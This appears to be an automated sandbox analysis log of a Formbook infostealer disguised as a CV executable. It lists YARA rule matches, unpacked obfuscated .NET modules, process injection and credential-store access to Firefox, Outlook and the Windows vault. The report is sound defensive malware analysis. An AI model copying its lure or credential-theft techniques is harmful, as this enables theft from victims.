            Source: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1459314243.00000000037F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: Curriculum Vitae Catalina Munoz.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.8e70000.6.raw.unpack, OxYXTBPtl3LAaaTJsD.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.435ffc0.3.raw.unpack, Hpb6sX0m5OuPGE34GK.cs | Security API names: _0020.SetAccessControl
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.435ffc0.3.raw.unpack, Hpb6sX0m5OuPGE34GK.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.435ffc0.3.raw.unpack, Hpb6sX0m5OuPGE34GK.cs | Security API names: _0020.AddAccessRule
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.42dc1a0.2.raw.unpack, Hpb6sX0m5OuPGE34GK.cs | Security API names: _0020.SetAccessControl
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.42dc1a0.2.raw.unpack, Hpb6sX0m5OuPGE34GK.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.42dc1a0.2.raw.unpack, Hpb6sX0m5OuPGE34GK.cs | Security API names: _0020.AddAccessRule
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.435ffc0.3.raw.unpack, OxYXTBPtl3LAaaTJsD.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.42dc1a0.2.raw.unpack, OxYXTBPtl3LAaaTJsD.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.8e70000.6.raw.unpack, Hpb6sX0m5OuPGE34GK.cs | Security API names: _0020.SetAccessControl
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.8e70000.6.raw.unpack, Hpb6sX0m5OuPGE34GK.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.8e70000.6.raw.unpack, Hpb6sX0m5OuPGE34GK.cs | Security API names: _0020.AddAccessRule
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.2e2aed4.1.raw.unpack, ReactionVessel.cs | Suspicious method names: .ReactionVessel.Inject
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.7500000.5.raw.unpack, ReactionVessel.cs | Suspicious method names: .ReactionVessel.Inject
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.2e3aeec.0.raw.unpack, ReactionVessel.cs | Suspicious method names: .ReactionVessel.Inject
            Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/1@16/12
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe | Mutant created: NULL
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
            Source: C:\Windows\SysWOW64\TSTheme.exe | File created: C:\Users\user~1\AppData\Local\Temp\63u1Q-P
            Source: Curriculum Vitae Catalina Munoz.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
            Source: C:\Program Files\Mozilla Firefox\firefox.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: TSTheme.exe, 0000000F.00000002.3660319790.0000000003559000.00000004.00000020.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000003.1647254707.0000000003559000.00000004.00000020.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3660319790.0000000003566000.00000004.00000020.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000003.1646951828.0000000003538000.00000004.00000020.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3660319790.000000000358A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Curriculum Vitae Catalina Munoz.exe | ReversingLabs: Detection: 63%
            Source: Curriculum Vitae Catalina Munoz.exe | Virustotal: Detection: 56%
            Source: unknown | Process created: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe "C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe"
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe | Process created: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe "C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe"
            Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe | Process created: C:\Windows\SysWOW64\TSTheme.exe "C:\Windows\SysWOW64\TSTheme.exe"
            Source: C:\Windows\SysWOW64\TSTheme.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe | Section loaded: mscoree.dll
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe | Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe | Section loaded: cryptsp.dll
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe | Section loaded: rsaenh.dll
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe | Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe | Section loaded: dwrite.dll
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe | Section loaded: textshaping.dll
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe | Section loaded: amsi.dll
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe | Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe | Section loaded: msasn1.dll
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe | Section loaded: gpapi.dll
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe | Section loaded: windowscodecs.dll
            Source: C:\Windows\SysWOW64\TSTheme.exe | Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\TSTheme.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\TSTheme.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\TSTheme.exe | Section loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\TSTheme.exe | Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\TSTheme.exe | Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\TSTheme.exe | Section loaded: version.dll
            Source: C:\Windows\SysWOW64\TSTheme.exe | Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\TSTheme.exe | Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\TSTheme.exe | Section loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\TSTheme.exe | Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\TSTheme.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\TSTheme.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\TSTheme.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\TSTheme.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\TSTheme.exe | Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\TSTheme.exe | Section loaded: mlang.dll
            Source: C:\Windows\SysWOW64\TSTheme.exe | Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\TSTheme.exe | Section loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\TSTheme.exe | Section loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\TSTheme.exe | Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\TSTheme.exe | Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\TSTheme.exe | Section loaded: cryptbase.dll
            Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe | Section loaded: wininet.dll
            Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe | Section loaded: mswsock.dll
            Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe | Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe | Section loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe | Section loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe | Section loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Windows\SysWOW64\TSTheme.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: Curriculum Vitae Catalina Munoz.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: Curriculum Vitae Catalina Munoz.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: OZCzxhvCDDlUqJnCoH.exe, 0000000E.00000000.1377872255.0000000000B2E000.00000002.00000001.01000000.0000000E.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662366685.0000000000B2E000.00000002.00000001.01000000.0000000E.sdmp
            Source: Binary string: TSTheme.pdb source: Curriculum Vitae Catalina Munoz.exe, 00000002.00000002.1457615887.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 0000000E.00000002.3661296507.00000000010D8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: Curriculum Vitae Catalina Munoz.exe, 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000003.1457676756.0000000004D79000.00000004.00000020.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3663554386.000000000526E000.00000040.00001000.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3663554386.00000000050D0000.00000040.00001000.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000003.1459524541.0000000004F20000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Curriculum Vitae Catalina Munoz.exe, Curriculum Vitae Catalina Munoz.exe, 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, TSTheme.exe, TSTheme.exe, 0000000F.00000003.1457676756.0000000004D79000.00000004.00000020.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3663554386.000000000526E000.00000040.00001000.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3663554386.00000000050D0000.00000040.00001000.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000003.1459524541.0000000004F20000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: TSTheme.pdbGCTL source: Curriculum Vitae Catalina Munoz.exe, 00000002.00000002.1457615887.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 0000000E.00000002.3661296507.00000000010D8000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            Source: Curriculum Vitae Catalina Munoz.exe, --.cs | .Net Code: _0003
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.435ffc0.3.raw.unpack, Hpb6sX0m5OuPGE34GK.cs | .Net Code: KJDEWMnueR System.Reflection.Assembly.Load(byte[])
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.8e70000.6.raw.unpack, Hpb6sX0m5OuPGE34GK.cs | .Net Code: KJDEWMnueR System.Reflection.Assembly.Load(byte[])
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.74e0000.4.raw.unpack, LoginForm.cs | .Net Code: _206B_206C_202A_202D_206F_206F_206C_202D_206A_202A_200B_206C_206E_206A_206D_206B_202C_206E_200C_206F_200D_206D_200C_200F_202C_206C_202E_206B_202B_202E_206E_206B_206B_206D_206C_202C_200D_202E_202C_200E_202E System.Reflection.Assembly.Load(byte[])
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.42dc1a0.2.raw.unpack, Hpb6sX0m5OuPGE34GK.cs | .Net Code: KJDEWMnueR System.Reflection.Assembly.Load(byte[])
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe | Code function: 0_2_07515EF3 pushfd ; retf 0_2_07515F11
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe | Code function: 0_2_0789171A pushfd ; ret 0_2_0789171B
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe | Code function: 0_2_07891B2B pushfd ; ret 0_2_07891B2C
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe | Code function: 0_2_07891AEA pushfd ; ret 0_2_07891AEB
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe | Code function: 0_2_078915AD pushfd ; ret 0_2_078915AE
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe | Code function: 0_2_07891C38 pushfd ; ret 0_2_07891C39
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe | Code function: 0_2_07891852 pushfd ; ret 0_2_07891853
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe | Code function: 2_2_00418810 push eax; ret 2_2_004188B8
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe | Code function: 2_2_0041885E push ss; ret 2_2_0041885F
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe | Code function: 2_2_0041786E push edx; ret 2_2_004178EA
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe | Code function: 2_2_00417887 push edx; ret 2_2_004178EA
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe | Code function: 2_2_00417146 pushad ; retf 2_2_00417152
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe | Code function: 2_2_00401972 push esp; iretd 2_2_0040199A
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe | Code function: 2_2_00407131 push esi; iretd 2_2_00407132
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe | Code function: 2_2_0040D1D7 push eax; iretd 2_2_0040D1D8
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe | Code function: 2_2_0040718E push edi; ret 2_2_00407191
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe | Code function: 2_2_0041CB51 push eax; iretd 2_2_0041CB5F
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe | Code function: 2_2_0040735A pushfd ; retf 2_2_00407363
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe | Code function: 2_2_00403330 push eax; ret 2_2_00403332
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe | Code function: 2_2_004075C4 push es; ret 2_2_004075D6
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe | Code function: 2_2_00401625 push eax; iretd 2_2_0040165A
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe | Code function: 2_2_00414765 push esp; retf 2_2_00414768
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe | Code function: 2_2_014C225F pushad ; ret 2_2_014C27F9
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe | Code function: 2_2_014C27FA pushad ; ret 2_2_014C27F9
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe | Code function: 2_2_014F09AD push ecx; mov dword ptr [esp], ecx 2_2_014F09B6
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe | Code function: 2_2_014C283D push eax; iretd 2_2_014C2858
            Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe | Code function: 14_2_04B9ED9A push es; ret 14_2_04B9EDAC
            Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe | Code function: 14_2_04BB0034 push ss; ret 14_2_04BB0035
            Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe | Code function: 14_2_04BA49AD push eax; iretd 14_2_04BA49AE
            Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe | Code function: 14_2_04BAE91C pushad ; retf 14_2_04BAE928
            Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe | Code function: 14_2_04B9E907 push esi; iretd 14_2_04B9E908
            Source: Curriculum Vitae Catalina Munoz.exe | Static PE information: section name: .text entropy: 7.958472092801501
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.8e70000.6.raw.unpack, Qas3xdyra6RNyrO1vfP.csHigh entropy of concatenated method names: 'DjgLJokA79', 'KAFLiZAiJF', 'NlZLWidMy4', 'zxRL1vKMm4', 'H6oLKUm9Wg', 'x0jLZbMEhB', 'G5yLoBFpQ7', 'vtDLPH3bPm', 'rFALN0Q1MV', 'KUGLmZG6lC'
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.8e70000.6.raw.unpack, i9NUHTnq1v8MTGavnG.csHigh entropy of concatenated method names: 'pZtqCRU0PN', 'r3DqBR737p', 'iHFqnn1uBt', 'lrMquytBk2', 'PejqcV4wIQ', 'w7Lq64LmAp', 'Bu4qj9yT6R', 'Bt2qvqpkk8', 'VfWqMFTyUL', 'hH1qkDao7f'
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.8e70000.6.raw.unpack, Hpb6sX0m5OuPGE34GK.csHigh entropy of concatenated method names: 's7KIR3bgyQ', 'fYXIacOyoF', 'HjfIst1RPh', 'mFEIDHBaiC', 'kF1ISjR86X', 'yGlI7QU7V0', 'uTcIGuKmkg', 'A1nI0jJwwf', 'K5PIYIRLvH', 'IiAIHOK4Cd'
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.8e70000.6.raw.unpack, DvFq1CsmOfeYK5xheQ.csHigh entropy of concatenated method names: 'Dispose', 'HRNy2iNtIV', 'PWjdcZemIV', 'N1o55Jw110', 'QJKy4Q2Y9R', 'USIyzgGWTN', 'ProcessDialogKey', 'qRadrqlC8u', 'B7YdyhPRjb', 'avXdder5UV'
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.42dc1a0.2.raw.unpack, YcnmxKNTnXA1NqQ4lc.csHigh entropy of concatenated method names: 'EDWD1NTw1o', 'u2vDZ6gOco', 'lmTDPwdoZ0', 'pF0DNQ5L9i', 'hCXDq9XnKA', 'GnWDO96N1n', 'wnMDfMbr5G', 'GJdD8X72nq', 'GINDLuNH1Q', 't9aDlRjyx1'
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.42dc1a0.2.raw.unpack, fqlC8u2Z7YhPRjbrvX.csHigh entropy of concatenated method names: 'VkR8Us0dH1', 'N9q8cVQqQU', 'wOQ86dNNm2', 's0W8jKATyK', 'MD68nPWiFE', 'WFE8v0kDB5', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.42dc1a0.2.raw.unpack, xKQ2Y9wRQSIgGWTNfR.csHigh entropy of concatenated method names: 'KRN8axy1PY', 'a0Q8sdrS68', 'CHG8Dj9Vj4', 'YwY8SCAULe', 'zUM87YOl7e', 'wKv8G6VhTo', 'csn80X7GJv', 'bpn8YE4VRu', 'kBt8HgXJSM', 'rgc8e5otpt'
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.42dc1a0.2.raw.unpack, qy5p5LUNIfQKmew1rq.csHigh entropy of concatenated method names: 'UXE7RO8d2c', 'A3g7sRQ1Or', 'S1P7SidSsw', 'x5i7G0e7Xm', 'dGl70x1nRS', 'ndYSQ22rrc', 'LsDS9b0BKH', 'XnYSTmQfMO', 'YPISwKqnLn', 'ztTS2vOWpw'
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.42dc1a0.2.raw.unpack, qy1pqrEQ3sOEpt1qlE.csHigh entropy of concatenated method names: 'B3hyGxYXTB', 'xl3y0LAaaT', 'ATnyHXA1Nq', 'U4lyecSKVR', 'TlEyqCg8y5', 'S5LyONIfQK', 'KxOSUlpr0nrZV1sMRG', 'y85Ev9KhoPIn0pGxYK', 'aNuyyayrWo', 'LqwyIVfEmw'
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.42dc1a0.2.raw.unpack, MJyjJtbGp98wUACFmA.csHigh entropy of concatenated method names: 'AM9GJmwIui', 'bc0GiIMXIQ', 'rNgGWrYPop', 'eZIG1DWdDp', 'udIGKVlbnD', 'Jw5GZFwG0r', 'zE5GoYbYhG', 'E5TGPKTFZX', 'GQXGN0n35L', 'kkxGmgZvdf'
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.42dc1a0.2.raw.unpack, UvteRy33KIyyiyhRJn.csHigh entropy of concatenated method names: 'r75fH9rJNN', 'ugsfeYPthf', 'ToString', 'mfrfaMc9aR', 'iGSfsce0uN', 'WxXfDSBndn', 'K1afSF3Qli', 'NgZf71WTmu', 'shHfG2XTkI', 'jAYf0Oaejm'
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.42dc1a0.2.raw.unpack, FAn5GI9Cb4yvKhVofj.csHigh entropy of concatenated method names: 'OyWfwDcRQ5', 'rbmf4djM1O', 'KW38rvDUlg', 'ANM8ysFOTl', 'G84fhD97tn', 'JMZfBZh3YQ', 'RwNfVcexTW', 'iFkfnjRgEy', 'TbKfumM9D0', 'otsfppi0Ab'
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.42dc1a0.2.raw.unpack, nr5UVF4misg4mgdUAT.csHigh entropy of concatenated method names: 'hf6LyS7T2Z', 'OGKLImP2eA', 'JKALEiY1jx', 'b3wLaj6bU7', 'nAwLshJicE', 'An5LShjABT', 'yBfL73trGI', 'qpN8T93O82', 'Hyg8wjPDgr', 'eay82UlxUR'
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.42dc1a0.2.raw.unpack, J9gH0fkhRdxeGx8H0l.csHigh entropy of concatenated method names: 'wl8Ga3f4fx', 'fGVGDOrcwj', 'RuWG75cpIu', 'VNL74GxkhL', 'Mxm7zgTx0n', 'BQMGrAB1kI', 'v38GyWqnT4', 'yO0Gdpdd4M', 'QEPGIrhFrN', 'Q92GEetj1b'
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.42dc1a0.2.raw.unpack, iKVRBkmAjnMyg3lECg.csHigh entropy of concatenated method names: 'WHZSKv33HH', 'rxmSoHL0pR', 'v0QD6WdPPO', 'S1oDjUJGvo', 'K5DDvq62xJ', 'AChDMsHPNu', 'rACDk0wbhs', 'gH3Dx9wCp2', 'nO4DbEXWU3', 'XHdDCS2cjw'
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.42dc1a0.2.raw.unpack, BRrrodyIpfJ2i78iZBd.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Hn0ln9m4HA', 'SotluUO4Cl', 'qp8lpSAfZx', 'eQal3diHfl', 'CADlQjkRdJ', 'JYml9gGv0N', 'yAAlTdUp1W'
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.42dc1a0.2.raw.unpack, OQYqIHzI2WrTnxnHF2.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'RMULF0mU4s', 'A34LqTvXiH', 'fLVLOIZS3R', 'mTHLfVCpC7', 't4HL8opncR', 'urCLLmLqBE', 'YBWLlN1u43'
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.42dc1a0.2.raw.unpack, BMWTCqVkjukBjFQf7X.csHigh entropy of concatenated method names: 'do4FPvEYXY', 'MT1FNbX2Pa', 'CSdFUaD4VR', 'NwcFc5oLr6', 'LmdFjsXHjo', 'LQaFv354TU', 'vusFkleL2G', 'FIAFxqycP6', 'pYlFCP0xcd', 'beDFhOsONA'
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.42dc1a0.2.raw.unpack, OxYXTBPtl3LAaaTJsD.csHigh entropy of concatenated method names: 'qiEsnNLmos', 'OUjsuFLZuX', 'b16spA17UN', 'bE9s3a0CBS', 'xxssQgf7aa', 'mkqs9BL4Bu', 'qPasT3T539', 'UGlswgNXJb', 'hKAs2aCofv', 'uUYs4UVpW8'
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.42dc1a0.2.raw.unpack, pwXeAKdFbkBqalm4Og.csHigh entropy of concatenated method names: 'rqKWmOsK6', 'upE1ygRjY', 'jDoZBVfO4', 'KuEoNuI4J', 'rlSNHXgf0', 'fShmaoHPl', 'KGcATmuYCWNneoNnPo', 'k7bkS21gHyNXXJB4kF', 'n6C8vaNZP', 'X2alTMvUf'
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.42dc1a0.2.raw.unpack, Qas3xdyra6RNyrO1vfP.csHigh entropy of concatenated method names: 'DjgLJokA79', 'KAFLiZAiJF', 'NlZLWidMy4', 'zxRL1vKMm4', 'H6oLKUm9Wg', 'x0jLZbMEhB', 'G5yLoBFpQ7', 'vtDLPH3bPm', 'rFALN0Q1MV', 'KUGLmZG6lC'
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.42dc1a0.2.raw.unpack, i9NUHTnq1v8MTGavnG.csHigh entropy of concatenated method names: 'pZtqCRU0PN', 'r3DqBR737p', 'iHFqnn1uBt', 'lrMquytBk2', 'PejqcV4wIQ', 'w7Lq64LmAp', 'Bu4qj9yT6R', 'Bt2qvqpkk8', 'VfWqMFTyUL', 'hH1qkDao7f'
